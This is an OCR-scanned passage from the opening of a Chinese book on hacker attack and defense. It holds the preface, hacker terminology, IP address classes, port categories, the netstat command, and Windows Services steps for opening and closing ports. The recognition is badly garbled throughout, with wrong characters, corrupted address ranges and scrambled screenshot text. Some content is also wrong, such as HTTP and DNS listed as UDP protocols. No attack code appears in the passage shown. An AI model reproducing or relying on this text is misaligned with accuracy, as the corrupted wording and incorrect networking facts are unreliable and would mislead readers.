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如 今 网 上 购物 、 投 资 、 理 财 等 已 经 占据 了 很 大 的 消费 市 场 ， 网 络 财产 的 安全 性 也 得 到 
越 来 越 多 的 重视 ， 如 果 用 户 的 网 络 账户 、 密 码 被 黑客 锣 取 ， 将 会 给 其 市 来 很 大 的 损失 。 基 
于 此 ， 本 书 对 于 一 些 黑 客 第 用 的 入 侵 手 段 进 行 了 详细 的 讲解 ， 并 且 提 供 了 相应 的 主动 防御 
音 施 ， 使 读者 能 够 循序 渐进 地 了 解 主动 防御 黑客 入 侵 的 关键 拉 术 与 方法 ， 提 局 安 全 防护 总 
识 并 应 用 于 实际 工作 中 。 和 希望 本 书 能 成 为 网 络 信息 安全 专业 撤 术 人 员 、 网 络 安全 管理 人 员 、 
网 络 使 用 者 及 信息 时 代 创 业者 的 一 本 实用 的 网 络 安全 工具 书 。 


关于 本 书 


在 现实 生活 中 ,“ 硅 客 ” 可 能 是 那些 非常 有 大 分 的 程序 员 ， 他们 将 众多 强大 的 工具 组 合 
起 来 解决 目 己 的 需求 ， 还 可 能 是 那些 使 用 “合法 ”工具 绕 过 审 伍 机 构 限 制 并 你 护 个 人 隐私 
的 人 。 俗 话说 ; 害 人 之 心 不 可 有 ， 防 人 之 心 不 可 无 。 知 己 知 彼 ， 方 能 百 战 不 焉 。 

本 书 便 是 基于 这 样 一 个 目的 而 诞生 的 ， 了 解 基 础 的 网 络 知 识 、 通 晓 黑 客 攻 击 手 段 与 沿 
用 黑客 软件 ， 从 而 用 知识 与 拉 巧 将 目 己 的 计算 机 与 网 络 很 好 地 你 扩 起 来 ， 达 到 防 患 于 未 然 
的 目的 。 


本 书 紧 罕 围 绕 “ 攻 ”和 “ 防 ” 两 个 不 同 的 角度 ， 在 讲解 黑客 攻击 手段 的 同时 介绍 了 相 
应 的 防范 方法 。 本 书 内 容 涵 订 了 从 零 开 始 认 识 黑 客 、 扫 摘 与 咒 探 工具 、 系 统 汤 洞 攻防 、 病 
毒 攻 防 、 木 马 攻防 、 网 游 与 网 吧 攻 防 、 注 入 工具 、 黑 客 入 侵 检测 工具 、 入 侵 痕 迹 清 除 技术 、 
密码 攻防 、 网 络 代 理 与 奶 踩 技术、 后 门 技 术 、 远 程控 制 技术 、 局 域 网 攻防 、QQ 账号 攻防 、 
系统 和 数据 的 备份 与 恢复 、 系 统 安全 防护 工具 等 ， 由 浅 入 深 地 讲述 了 墨客 攻击 的 原理 、 般 


用 手段 ， 让 读者 在 了 解 的 同时 学 习 “ 拒 敢于 千里 ”的 方法 。 


本 书 特色 


本 书 由 浅 入 深 地 讲解 了 黑客 攻击 和 防范 的 上 共 体 方法 和 技巧 ， 通 过 案例 介绍 多 种 攻击 方 
法 和 攻击 工具 的 使 用 。 通 过 完成 一 个 个 实践 任务 ， 读 者 可 以 轻松 掌握 各 知识 点 ， 在 不 知 不 

快速 提升 实战 技能 

@ 任务 驱动 ， 自 主 学 习 ， 理 论 + 实 战 + 图 文 = 让 读者 快速 精通 

@ 讲解 全 面 ， 轻 松 入 门 ， 快 速 打通 初学 者 学 习 的 重要 关卡 。 

@ 实例 为 主 ， 吻 于 上 手 ， 模 拟 真 实 工作 环境 ， 解 决 各 种 疑难 问题 。 

本 书 以 实例 分 析 加 案例 剖 解 为 主要 脉络 ， 以 图 文 并 成 、 按 图 索 唉 的 方式 详细 讲解 黑客 
的 攻击 手法 和 相应 的 网 络 安 全 管理 防御 搁 术 ， 并 采用 架 例 驱动 的 写作 方法 ， 详 细 分 析 每 一 
个 操作 案例 ， 力 求 通过 一 个 知识 点 的 讲解 ， 让 读者 理解 和 掌握 类 似 场合 的 应 对 思路 。 


本 书 适 合 人 和 群 


本 书 紧 么 围 纸 “ 攻 ”和 “ 防 ” 两 个 不 同 的 角度 ， 讲 解 了 黑客 工具 与 反 黑 客 工 具 的 使 用 
方法 。 作 为 一 本 面 问 广大 网 络 爱好 者 的 速 租 手册 ， 本 书 适 合 以 下 读者 学 习 使 用 : 
@ 计算 机 操作 零 基础 的 广大 读者 ; 
@ 和 击 要 你 护 数据 安全 的 日 单 办 公 人 员 ; 
@@ 网 络 管理 人 员 ; 
@@ 是 客 技术 爱好 者 。 


本 书 作者 


本 书 由 天 河 文化 编著 ， 参 与 本 书 编写 和 资料 整理 的 人 员 有 郑 奎 国 、 王 叶 、 候 稚 蕉 、 即 
瑚 怡 、 施 亚 、 吾 晨 伟 、 朱 伟 伟 、 李 季 、 郑 林 、 张 防 阮 、 丁 建 尺 、 方 开 庆 、 陈 红 、 陈 伟 、 赵 
雨 、 王 越 、 赵 根 昌 、 竹 和沙 、 盏 玉 珍 和 余 东 航 。 

最 后 ， 需 要 提醒 大 家 的 是 : 根据 国家 有 关 法 律 规定 ， 任 何 利用 黑客 技术 攻击 他 人 的 行 
为 都 属于 违法 行为 ， 锅 望 读 者 在 阅读 本 书后 不 要 使 用 本 书 中 介绍 的 黑客 技术 对 他 人 进行 攻 
击 ， 人 否则 后 采 目 负 。 
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从 老 开 始 认 识 黑 客 


想 要 学 习 黑 客 攻防 知识 ， 就 得 了 解 进程 、 端 口 、 卫 地 址 以 及 黑客 第 用 的 术 
语 和 命令 。 本 章 专门 针对 初学 者 对 这 方面 的 内 容 进 行 讲解 ， 从 而 帮助 读者 为 后 
面 的 学 习 打 好 基础 。 


O IP 地 址 、 端 口 
〇 黑客 常用 术语 
〇 黑客 常用 命令 
O 虚拟 测试 环境 


客 过 
区 -工具 人 攻 了 


1.1 认识 黑客 


1.4.1 白 帆 黑 委 、 灰 帽 黑客 以 及 黑 帆 黑客 


1994 年 以 来 , 在 全 球 迅 狐 发 展 的 因特网 为 人 们 提供 了 便利 、 目 由 和 无 限 的 财 襄 , 政治 、 
车 事 、 经 济 、 科 技 、 教 育 、 文 化 等 各 个 方面 都 越 来 越 网 络 化 ， 并 且 逐 潮 成 为 人 们 生活 、 妈 
乐 的 一 部 分 。 可 以 说 ， 信 息 时 代 已 经 到 来 ， 信 息 已 成 为 物质 和 能 量 以 外 维持 人 类 社会 的 第 
三 资源 ， 它 是 未 来 生活 中 的 重要 介质 。 随 独 计算 机 的 普及 和 因特网 技术 的 迅速 发 展 ， 黑 客 
也 随 之 出 现 了 。 

黑客 的 基本 含义 是 指 一 个 拥有 允 练 计算 机 技术 的 人 ， 但 大 部 分 的 媒体 将 “黑客 ”用 于 
指 计算 机 侵入 者 。 基 于 此 ， 墨 客 双 有 上 日 帽 辩 客 、 灰 帽 黑客 和 黑 帽 姜 客 的 说 法 。 

日 帆 黑 客 是 指 有 能 力 人 破坏 计算 机 安全 但 无 屎 总 目的 的 黑客 。 日 帽子 一 般 有 清楚 的 道德 
规范 ， 并 常常 试 图 通过 企业 合作 改善 被 发现 的 安全 轮 上 后 。 

灰 幅 黑客 是 指 对 于 伦理 和 法 律 “暧昧 不 清 ” 的 黑客 。 


1.1.2 黑帮、 红 各 、 监 客 以 及 驴 客 


墨客 ， 最 早 源 目 英文 hacker， 所 谓 黑 客 都 是 水 平 高 超 的 计算 机 专家 ， 尤 其 是 程序 设计 
人 人员， 算是 一 个 统称 。 

红 客 ， 维 护 国家 利益 、 代 表 中 国人 民意 志 的 红 客 ， 他 们 热爱 目 己 的 祖国 ， 热 爱 和 和 平 ， 
极力 地 维护 国家 安全 与 得 严 。 

蓝 客 ， 信 和 仰 目 由 ， 提 倡 爱 国 主义 的 壮 客 们 ， 用 目 己 的 力量 来 维护 网 络 的 和 乎 。 

骇 客 ， 是 “cracker” 的 首 诺 ， 婚 是 “破解 者 ”的 意思 。 从 事 恶意 伏 解 商业 软件 、 亚 意 
入 侵 别 人 的 网 站 等 事务 。 


1.2 认识 IP 地 址 


1.2.1 下 地 址 概述 


所 谓 卫 地 址 就 是 一 种 主机 编 址 方式 ， 每 个 连接 在 Internet 上 的 主机 都 分 配 一 个 32bit 
(位 ) 地 址 ， 也 称 为 网 际 协议 地 址 。 

按照 TCP/IP 〈Transport Control Protocol/Internet Protocol， 传 输 探 制 协议 /Internet 协议 ) 
协议 的 规定 ， 卫 地 址 用 二 进 制 来 表示 ， 每 个 IP 地 址 长 32 位 ， 即 4 字 节 。 例 如 一 个 采用 二 
进 制 形式 的 IP 地 址 是 “00001010000000000000000000000001” 这 么 长 的 地 址 人 们 处 理 起 
来 就 会 很 费劲 ， 为 了 方便 使 用 ，IP 地 址 经 第 被 写成 十 进 制 的 形式 ， 中 间 使 用 符号 “.” 分 为 
不 同 的 字 节 ， 即 用 XXX.XXX.XXX.XXX 的 形式 来 表现 ， 每 组 XXX 代表 小 于 或 等 于 255 
的 十 进 制 数 ， 如 192.168.38. 6。IP 地 址 的 这 种 表示 方法 称 为 “点 分 十 进 制 表示 法 ”这 显然 
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比 二 进 制 的 1 或 0 容易 记忆 。 

一 个 完整 的 IP 地 址 信息 ， 通 常 应 包括 IP 地 址 、 子 网 掩 码 、 默 认 网 关 和 DNS 4 部 分 内 
容 。 当 它们 协同 工作 时 ， 用 户 才 可 以 访问 Internet 并 被 Internet 中 的 计算 机 所 访问 〈( 采 用语 
态 IP 地 址 接 入 Internet 时 ，ISP 应 当 为 用 户 捉 供 全 部 IP 地 址 信息 )。 

1. IP 地 址 

企业 网 络 使 用 的 合法 IP 地 址 ， 由 提供 Internet 接 入 的 服务 商 (ISP) 分 配 私 有 IP 地址 
后 ， 才 可 以 由 网 络 管理 员 目 由 分 配 。 但 网 络 内 部 所 有 计算 机 的 下 地 址 都 不 能 相同 ， 人 否则 会 
发 生 IP 地 址 冲突 ， 导 致 网 络 连接 失败 。 

2. 子 网 掩 码 

子 网 掩 码 是 与 IP 地 址 结合 使 用 的 一 种 技术 。 其 主要 作用 有 两 个 ， 一 是 用 于 确定 地 址 中 
的 网 络 写 和 主机 号 ， 二 是 用 于 将 一 个 网 络 划 分 为 奉 干 个 子 网 络 。 

3. 默认 网 关 

默认 网 关 是 指 一 台 主 机 如 果 找 不 到 可 用 的 网 关 ， 束 把 数据 包 发 送 给 默认 指定 的 网 关 ， 
由 这 个 网 关 来 处 理 数 据 包 。 从 一 个 网 络 癌 另 一 个 网 络 发 送信 息 必 须 经 过 一 道 “关口 ” 这 道 
天 口 束 是 网 天 。 

4. DNS 

DNS 服务 用 于 将 用 户 的 域名 请 求 转换 为 IP 地 址 。 如 果 企 业 网 络 没 有 提供 DNS 服务 ， 
则 DNS 服务 器 的 IP 地址 应 当 是 ISP 的 DNS 服务 器 。 如 果 企 业 网 络 目 己 提供 了 DNS 服务 ， 
则 DNS 服务 需 的 卫 地 址 就 是 内 部 DNS 服务 器 的 IP 地 址 。 


1.2.2 PP 地址 的 分 类 


在 互联 网 中 的 每 个 接口 有 一 个 唯一 的 IP 地址 与 其 对 应 , 该 地 址 并 不 是 采用 平面 形式 的 
地 址 空间 ， 而 是 具有 一 定 的 结构 。 一 般 情 况 下 ， 卫 地 址 可 以 分 为 5 大 类 ， 即 A 类 、B 类 、 
C 关 、D 类 以 及 EE 类 。 

1. A 类 IP 地 址 

其 中 IP 地 址 由 一 个 字 节 的 网 络 地 址 和 3 个 字 节 的 主机 地 址 组 成 , 网 络 地 址 的 最 高 位 必 
须 是 “0” 可 用 的 A 类 网 络 有 126 个 ， 每 个 网 络 能 容纳 1 亿 多 台 主 机 (网 络 写 不 能 为 127， 
因为 该 网 络 号 被 保留 用 作 回 路 及 诊断 功能 )， 地 址 范围 为 1.0.0.1 一 126.1$5.25$.254。 

2. B 类 IP 地 址 

其 中 IP 地 址 由 2 个 字 节 的 网 络 地 址 和 2 个 字 节 的 主机 地 址 组 成 , 网 络 地 址 的 最 高 位 必 
须 是 “10” 可 用 的 B 类 网 络 有 16 382 个 ， 每 个 网 络 能 容纳 6 万 多 台 主 机 ， 地 址 范围 为 
128.0.0.1~191.255.255.254。 

3. C 类 IP 地 址 

其 中 IP 地 址 由 3 个 字 节 的 网 络 地 址 和 1 个 字 节 的 主机 地 址 组 成 , 网 络 地 址 的 最 高 位 必 
须 是 “110” 可 用 的 C 类 网 络 可 达到 209 万 多 个 ， 每 个 网 络 能 容纳 254 台 主 机 ， 地 址 范围 
为 192.0.0.1 一 223.2$$.2$$.2S4。 

4. DD 类 IP 地 址 

该 类 地 址 用 于 多 点 广播 ， 第 一 个 字 节 以 “1110” 开 始 ， 它 是 一 个 专门 保留 的 地 址 ， 并 
不 指 问 特定 的 网 络 。 目 前 这 一 类 地 址 被 用 在 多 点 的 广播 中 。 多 点 广播 地 址 用 来 一 次 寻 址 一 
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组 计算 机 ， 它 标识 共享 同一 协议 的 一 组 计算 机 ， 地 址 范围 为 224.0.0.1 一 239.25$.255.254。 
S. EE 类 JP 地 址 
该 类 地 址 以 “11110” 开 始 ， 为 将 来 使 用 而 保留 ， 全 零 地 址 〈 即 0.0.0.0) 对 应 于 当前 主 
机 ; 全 “1” 地 址 ( 即 255.255.255.255〉 是 当前 子 网 的 广播 地 址 ， 地 址 范围 为 240.0.0.1 一 
255.255.255.254。 


全 “0” 和 全 “1” 的 全 地 址 禁止 使 用 ， 因 为 全 “0” 代 表 本 网 络 ， 而 全 “1” 


是 广播 地 址 (在 思科 交换 机 上 可 以 使 用 全 “0” 地 址 )。 和 常用 的 是 A、B、C 这 3 
类 地 址 。 


1.3 认识 端口 


端口 《port〉 可 以 认为 是 计算 机 与 外 界 通 信人 交流 的 出 口 。 其 中 便 件 领域 的 端口 义 称 接 
口 ， 如 USB 问 口 、 串 行 山 口 等 。 软 件 领域 的 端口 一 般 指 网 络 中 面 癌 连接 服务 和 无 连接 服 
务 的 通信 协议 端口 ， 是 一 种 抽象 的 软件 结构 ， 包 括 一 些 数据 结构 和 IJO〈 基 本 输入 输出 ) 
绥 冲 区 。 

闹 口 是 传输 层 的 内 容 ， 是 面 问 连接 的 ， 它 们 对 应 看 网 络 上 常见 的 一 些 服务 。 这 些 第 见 
的 服务 可 划分 为 使 用 TCP 端口 (和 面 癌 连接 ， 如 打 电 话 〉 和 使 用 UDP 应 口 〈 无 连接 ， 如 与 
信 ) 两 种 。 

在 网 络 中 可 以 被 命名 和 有 寻 址 的 通信 交口 是 一 种 可 分 配 资源 ， 由 网 络 OSI (Open System 
Interconnection Reference Model， 开 放 系 统 互 连 参 考 模 型 ) 协议 可 知 ， 传 输 层 与 网 络 层 的 区 
别 是 传输 层 提 供 进 程 通 信 能 力 ， 网 络 通信 的 最 终 地 址 不 仅 包 括 主机 地 址 ， 还 包括 可 描述 进 
程 的 某 种 标识 。 因 此 ， 当 应 用 程序 〈 调 入 内 存 运 行 后 一 般 称 为 进程 ) 通过 系统 调用 与 茶 端 
口 建立 连接 〈Binding， 绑 定 ) 之 后 ， 传 输 层 传 给 该 端口 的 数据 都 被 相应 进程 所 接收 ， 相 应 
进程 发 给 传输 层 的 数据 都 从 访问 口 输出 。 


1.3.1 痛 口 的 分 类 


在 网 络 技术 中 ， 端 口 大 致 有 两 种 含义 ; 一 是 物理 意义 上 的 商品 ， 如 集线器 、 交 换 
机 、 足 由 器 等 用 于 连接 其 他 网 络 设备 的 接口 ; 二 是 逻辑 意义 上 的 问 口 ， 一般 指 TCP/IP 
协议 中 的 端口 ， 范 围 为 0~65 535， 如 浏览 网 页 服务 的 80 端口 ， 用 于 FTP 服务 的 21 
端口 等 。 

逻辑 意义 上 的 端口 有 多 种 分 类 标准 ， 常 见 的 分 类 标准 有 如 下 两 种 。 

1. 按 端 口号 分 布 划分 

按 问 口号 分 布 划分 ， 可 以 把 端口 分 为 公认 端口 、 注 册 端 口 以 及 动态 和 /或 私有 端口 等 。 

(1) 公认 奖 口 

公认 端口 包括 端口 号 0 一 1023。 它 们 紧密 绑 定 (binding〉 于 一 些 服务 。 通 常 这 些 问 口 
的 通信 明确 表明 了 某 种 服务 的 协议 ， 比 如 80 端口 分 配给 HTTP 服务 ，21 端口 分 配给 FTP 
服务 等 。 
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(2) 注册 端口 

注册 端口 包括 端口 号 1024 一 49 151。 它们 松散 地 
绑 定 于 一 些 服务 。 也 就 是 说 ， 有 许多 服务 绑 定 于 这 些 服务 器 常见 应 用 端口 
端口 ， 这 些 端 口 同 样 用 于 许多 其 他 目的 ， 比 如 许多 系 有 本 本 
统 处 理 动态 端口 从 1024 左右 开始 。 - Ss 

(3) 动态 和 /或 私有 端口 = 

动态 和 /或 私有 端口 包括 端口 号 49 132 一 65 535。 本 
理论 上 ， 不 应 为 服务 分 配 这 些 端口 。 但 是 一 些 木马 和 四 es 
病毒 就 比较 喜欢 这 样 的 端口 , 因为 这 些 端 口 不 易 引 起 HTTP 
人 们 的 注意 ， 从 而 很 容易 屏 菩 。 jin POP3 

2. 按 协 议 类 型 划分 攻 RPC 

根据 所 提供 的 服务 方式 ， 端 口 又 可 分 为 TCP 端 人 NotBIOS 
口 和 UDP 端口 两 种 。 一 般 直 接 与 接收 方 进行 的 连接 ne ee 
方式 ， 大 多 采用 TCP 协议 。 只 是 把 信息 放 在 网 上 发 a MySQL 
布 而 不 关心 信息 是 否 到 达 ( 也 即 “ 无 连接 方式 ”)， 则 a SQL 
大 多 采用 UDP 协议 。 8080 Tomcat 


使 用 TCP 协议 的 常见 问 口 主要 有 如 下 几 种。 

1) FTP 协议 端口 。 定 义 了 文件 传输 协议 ， 使 用 21 端口 。 某 计算 机 开 了 FTP 服务 便 有 局 
动 了 文件 传输 服务 ， 下 载 文件 和 上 传 主页 都 要 用 到 FTP 服务 。 

2) Telnet 协议 端口 。 一 种 用 于 远程 登录 的 端口 ， 使 用 23 端口 ， 用 户 可 以 自己 的 映 份 
远程 连接 到 计算 机 上 ， 通 过 这 种 端口 可 提供 一 种 基于 DOS 模式 的 通信 服务。 如 文 持 纯 字 符 
界面 BBS 的 服务 器 会 将 23 端口 打开 ， 以 对 外 提供 服务 。 

3) SMTP 协议 端口 。 现 在 很 多 邮件 服务 器 使 用 的 都 是 这 个 简单 邮件 传送 协议 来 发 送 邮 
件 。 如 第 见 免 费 邮件 服务 中 使 用 的 惑 是 此 邮件 服务 端口 ， 所 以 在 电子 邮件 设置 中 经 各 会 看 
到 有 SMTP 并 口 设置 栏 ， 服 务 器 开放 的 是 25 号 端口 。 

4) POP3 协议 端口 。POP3 协议 用 于 接收 邮件 ， 通 常 使 用 110 端口 。 只 要 有 相应 使 用 
POP3 协议 的 程序 〈 如 Outlook 每 )， 就 可 以 直接 使 用 邮件 程序 收 到 邮件 (如 使 用 126 邮箱 
的 用 户 就 没有 必要 先进 入 126 网 站 ， 再 进入 自己 的 邮箱 来 收 信 了 )。 

使 用 UDP 协议 的 利 见 病 口 主要 有 如 下 几 种 。 

1) HTTP 协议 端口 。 这 是 用 户 使 用 最 多 的 协议 ， 也 即 “ 超 文 本 传输 协议 ”。 当 上 网 浏 
哆 网 页 时 ， 就 要 在 提供 网 页 资源 的 计算 机 上 打开 80 号 端口 以 提供 服务 。 通 第 的 WWAW 服 
务 等 使 用 的 就 是 这 个 尊 口 。 

2) DNS 协议 交口 。DNS 用 于 域名 解析 服务 ， 这 种 服务 在 Windows NT 系统 中 用 得 最 
多 。Internet 上 的 每 一 台 计 算 机 都 有 一 个 网 络 地 址 与 之 对 应 ， 这 个 地 址 束 是 IP 地 址 ， 但 由 
于 这 种 表示 方法 不 便于 记忆 ， 于 是 就 出 现 了 域名 。 访 问 计 算 机 时 只 需要 知道 域名 即 可 ， 域 
名 和 IP 地 址 之 间 的 变换 由 DNS 服务 喜来 完成 (DNS 用 的 是 53 号 剖 口 )。 

3) SNMP 协议 端口 。 即 简单 网 络 管理 协议 ， 用 来 管理 网 络 设备 ， 使 用 161 号 端口 。 


ES 


Pe > 
2 工具 全 攻略 


会 全 人性 
4) QQ 协议 应 口 。QQ 程序 即 提供 服务 又 接收 服务 ， 使 用 无 连接 协议 ， 即 UDP 协 
议 。QQ 服务 右 使 用 8000 写 病 口 侦 听 是 否 有 信息 a 到来， 客户 问 使 用 4000 号 站 口 问 外 发 
送信 息 。 


1.3.2 至 看 痛 口 


为 了 得 找 目 标 主机 上 都 开放 了 哪些 端口 , 可 以 使 用 某 些 扫描 工具 对 目标 主机 进行 一 
定 范 围 内 的 痕 口 扫 摘 。 

在 Windows 系统 中 ， 可 以 使 用 Netstat 命令 查看 端口 。 在 “命令 提示 符 ” 窗 口中 运行 
“netstat -a -0” 命 令 ， 即 可 看 到 以 数字 形式 显示 的 TCP 和 UDP 连接 的 问 口 号 及 其 状态 ， 且 


体 步 骤 如 下 。 
STEP01: 单 击 “ 运 行 ”命令 STEP02: 输入 “cmd” 命 令 
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Monitor Tomcat 
A 


Microsoft Baseline Security 


3) ”Windows 将 根据 您 所 输入 的 名 称 ， 为 您 打开 相应 的 程序 、 


Wy Analyzer 2.2 Ee 记 忻 夹 、 广 档 或 Internet 资源 。 
,SI 


Shadow Security Scanner 
ww FreeportScanner 


了 
| LS1 ProtectX Hacker Defence Suite 


在 弹出 的 “开始 ”菜单 中 单 击 “ 运 行 ”命令 。 国 在 文本 框 中 输入 园 单 击 “ 确 定 ” 按 钮 。 


“cm J 命令 。 


日 一 人/ mm -人 [1 yy 

Te re 打开 命令 提示 符 窗口 后 输入 “netstat -a 一 n 

日 .日 .日 .日 :日 lS H i ET 口 gh 

0-0-0-0:0 ISITENINE 命令 查看 TCP 和 UDP 连接 的 端口 号 及 状态 。 

0.0.0.08:0 S 

@.0.0.8:0 ,ISTE 3 
.090.0.90:1648 @.0.90.8:09 
.0.0.0:10649 @.0.0.0:0 
0.90.0.0:1166 HH.0.90.090:09 
0D.9.D.9:1286 上 .日 .日 .日 : 晶 
DB.D-B:2113 0.0.90.0:09 
.9090.0.0:3389? [2 | 
0 A [7 | 

.0.0.9:D 

B-0-09.9:0 
9D.9.D9D.9:8592 @.0.0.0:09 


9-9.D.-9:21329 8@.0.90.8:0 STENING 
0.0.0.09:21321 HH.0.90.9:0 [STENING 


如 采 攻 击 者 使 用 扫描 工具 对 目标 主机 进行 扫描 ， 即 可 获取 目标 计算 机 打开 的 端口 情 


况 ， 并 了 解 目 标 计 算 机 提供 了 哪些 服务 。 根 据 这 些 信息 ， 攻 击 者 即 可 对 目标 主机 有 一 个 
初步 了 解 。 
如 果 在 管理 员 不 知情 的 情况 下 打开 了 太 多 器 口 ， 则 可 能 出 现 两 种 情况 : 一 种 是 提供 了 


EL 
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服务 而 管理 者 没有 注意 到 ， 例 如 安 逆 IS 服务 时 ， 软 件 束 会 目 动 地 增加 很 多 服务 ， 为 一 种 
征服 务 人 右 被 攻击 者 植 入 了 木马 程序 ， 通 过 特殊 的 中 口 进行 通信 。 这 两 种 情况 都 比较 危险 ， 
管理 员 不 了 解 服务 器 提供 的 服务 加 会 降低 系统 的 安全 系数 。 


13.3 ”开局 和 天 闭 疾 口 


默认 情况 下 ，Windows 有 很 多 端口 是 开放 的 。 在 用 户 上 网 时 ， 网 络 病毒 和 黑客 可 以 通 
过 这 些 端口 连 上 用 户 的 计算 机 。 为 了 让 计算 机 系统 变 得 更 加 安全 ， 应 该 封 财 这 些 端 口 ， 主 
要 有 TCP 端口 135、139、445、593、1025 和 UDP 端口 137、138、445、 一 些 流行 病毒 的 
后 门 端口 〈 如 TCP 端口 2745、3127、6129) 以 及 远程 服务 访问 端口 3389。 

1. 开局 亲口 

在 Windows 系统 中 开局 端口 的 具体 操作 步骤 如 下 。 


STEP01: 单 击 “控制 面板 ”命令 STEP02: 打开 “控制 面板 ”窗口 


演 制 面板 0 虽 -加 ,SM ， 所 i 册 ， | 作 || 总 5 


设备 和 打印 机 文件 (编辑 (E) ”查看 (V) 工具 (T) 帮助 (H) 


调整 计算 机 的 设置 


到 控 1TFTV 澳 长 中 性 气 钊 切 有 


有 默认 程序 


管理 I 具 


电话 和 词 制 解 洞 路 甸 电源 选项 


剧 个 性 化 
史记 三 多 家 庭 组 
站 亦 Ki < 键盘 


锥 天 人 程序 天 多 民 管 理 器 


@ tate 2 KvinsS 


一 人 


在 “开始 ”菜单 中 单 击 “ 控 制 面板 ”命令 。 团 将 查看 方式 切换 为 加 双击 “管理 工 
“大 图 标 ”。 具 ” 选 项 。 


STEP03: 打开 “管理 工具 ”窗口 STEP04: 打开 “服务 ”窗口 


NS 


文件 (月 ”操作 (A) ”前 看 (V) ”帮助 (H) 
包 外 | 国 | G BIB 了 FI? 
文件 (了 ”编辑 (E) ”前 硅 (V) 工具 (T) ”帮助 (H) 本 | 
Office Source Engine 名 称 
A S% Net Msmq Liste... 
名 称 修改 日 期 二 至 [= % Net.Pipe Listene.,.. 
%% Net.Tcp Listener... 
如 | Internet 信息 服务 (TS) 管 理 器 2013/12/16 10:56 。 快 各 NetTep Listener 
; $% Net.Tcp Port Sh,.. 
全 iSCSI 发 起 程序 2009/7/14 12:41 ; 6 Netlogon 
[3 Windows PowerShell Modules 2009/7/14 12:52 SS Network Access 
国 ] Windows 内 存 涂 新 2009/7/14 12;41 千 Network Connec... 
2011/5/26 10:15 
2011/5/26 10:15 
2009/7/14 12:41 Office Source E... 
2009/7/14 12;41 2 SS Office Software ... 
2009/7/14 12:41 大 于 %% Offline Files 
号 Parental Controls 
2009/7/14 12:42 


S$ Peer Name Res..， 
2009/7/14 12:42 S Peer Networkin... 


后 Network List Ser... 
% Network Locatio... 
% Network Store 1.., 


号 Peer Networkin... 
SPerformance Lo 


HEL 


双击 服务” 选项 。 查看 多 种 服务 项 目 。 
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re 


全 人 人 他 
STEP05: 启动 服务 


Application Expe， 
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在 应 ..。 已 启动 ”手动 


中 Application Host..， 为 I.. 


i Application Iden... 


3 Application Infor., 


SE Application Laye... 


SE Application Man... 


局 动 (9) 
停止 (O) 
暂停 (U) 


STEP06: 启动 类 型 设置 


常规 
服务 名 称 : AppIDSvwe 
显示 名 称 hpplication Tdentity 


2 PT 4 标语。 芋 2 E 
描述 : 避 本 PF 用 此 服务 将 阻 


行 MppLockero 


3 


可 执行 文件 的 路 径 : 


C:\Windows\system32\svchost. exe -k Local3ervwicekrdHoTmpersor 


恢复 (M) 
重新 启动 (E) 


ASP.NET State S... 
二 Background Inte,， 


3 Baidu Updater 所 有 任务 (内 服务 状态 : 款 
© Base Filtering En.. 
eR 人 信 上 O) 暂停 F】 | [恢复 四) 


ST: BDMRTP Service 一 一 
区 BDSGRTP Service 当 从 此 处 启动 服务 时 ， 您 可 指定 所 适用 的 启动 参数 。 


局 动 参数 仙 ) : 


:BitLocker Drive ,.. 


CF Bink [atal Da- 


[en [el 


选 定 要 启动 的 服务 后 ， 右 击 该 服务 , 在 弹出 的 快捷 在 “启动 类 型 ”下 拉 列 表 图 启动 成 功 后 单 
菜单 中 选择 “属性 ”命令 。 中 选择 “自动 ”选项 ， 然 后 单 。 ” 击 “ 确 定 " 按钮 。 


| 击 “ 启 动 ” 按 钮 。 
STEP07: 查看 已 启动 的 服务 


Apache Tomcat ... 
三 Application Expe... 
Si Application Host,., 3 
a 有 Application Iden... 
SApplication Infor... 
3 Application Laye... 
SE Application Man.. 


可 以 看 到 该 服务 在 “状态 " 一 栏 中 已 标记 为 “已 启动”， 
局 动 类 型 为 “自动 ”。 


:ASP.NET State S.. 
3 Background Inte... 
3 Baidu Updater 

SE Base Filtering En... 
BDMRTP Service 
3 BDSGRTP Service 
SE BitLocker Drive .. 


2. 关闭 端口 
在 Windows 系统 中 关闭 端口 的 具体 操作 步骤 如 下 。 
STEP01: 打开 “服务 ”窗口 STEP02: 关闭 服务 


ee) Si Apache Tomcat ... 
文 伯 朋 ” 报 作 (A 豆 看 (V) 帮助) 


锯 外 | 国 | GB 日 而 | PP @ 1 必 


SS Application Expe... 

pe 1 

rr 一 SApplication Host... 
% Net,Msmq Liste... 


Net.Pipe Listene... 
% Net.Tcp Listener... 


% Net.Tcp Port Sh... Prov. 
并 | 区 Netlogon 

%% Network Access ... 
%% Network Connec... 
% Network List Ser... i 
% Network Locatio... 


S$% Network Store 1... 
% Office Source E... 
Office Software ... 
‘Offline Files 

二 Parental Controls 
中 Peer Name Res... 
$ Peer Networkin... 
5 peer Networkin... 
Performance Lo... 
人 plug and Play 

EE DnD-¥ 1D Rue Fn 


$A Application Iden... 
$$ Application Infor... 
Application Laye... 
S$ Application Man... 
SS ASP.NET State S$... 
二 Background Inte... 
Baidu Updater 

二 Base Filtering En... 
BDMRTP Service 
BDSGRTP Service 


局 动 [9) 


停止 (O) 
暂停 (U) 
恢复 (MI) 
重新 启动 (E) 


所 有 任务 (内 


BitLocker Drive .… 


选 定 要 关闭 的 服务 ， 右 击 该 服务 ， 在 弹出 的 快捷 菜 
单 中 选择 “属性 ”命令 。 


查看 多 种 服务 项 目 。 


:0 


STEP03: ”启动 类 型 设置 


Apache Tomcat .. Apa,.. 
各 Application Expe..， 在 应 .. 
守 Application Host,,， 为 工 .， 


PRE < 元 1 人] 二 1 二 

并 验证 应 用 程序 的 标识 。 禁用 此 服务 将 阻 ^ 

所 和 

可 执行 文件 的 路 径 : Application Infor... 使 用 ... 
C:\Windows\system32\svehost. exe -k LocalServicehndHoImpersor Pa a _ 
Application Laye... 为 In... 


守 Application Man..， 为 通 ... 

SE ASP.NET State S..。 Prov... 

服务 状态 : 三 Background Inte... 使 用 ... 
= Baidu Updater 百度. 

启动 G) 暂停 全 ) KX 旺 (R) 二 Base Filtering En..， 基 本 .. 
当 从 此 处 启动 服务 时 ， 您 可 指定 所 适用 的 启动 参数 。 于 BDMRTP Service ”百度 .… 
有 剑 BDSGRTP Service 百度 .…. 


就 BitLocker Drive ,.。 BDE... 


动 类 型 已 标记 为 “禁用 "， 状 态 栏 
ly” 


在 “启动 类 型 ”下 拉 列 服务 停止 后 单 ”可 以 看 到 该 服务 
表 中 选择 “禁用 ” 选项 , 然 。 ” 击 “ 确 定 ” 按 钮 。 也 不 再 标记 “已 
后 单 击 “ 停 止 ”按钮 。 


局 
局 


li3.4 ”新 口 的 限制 


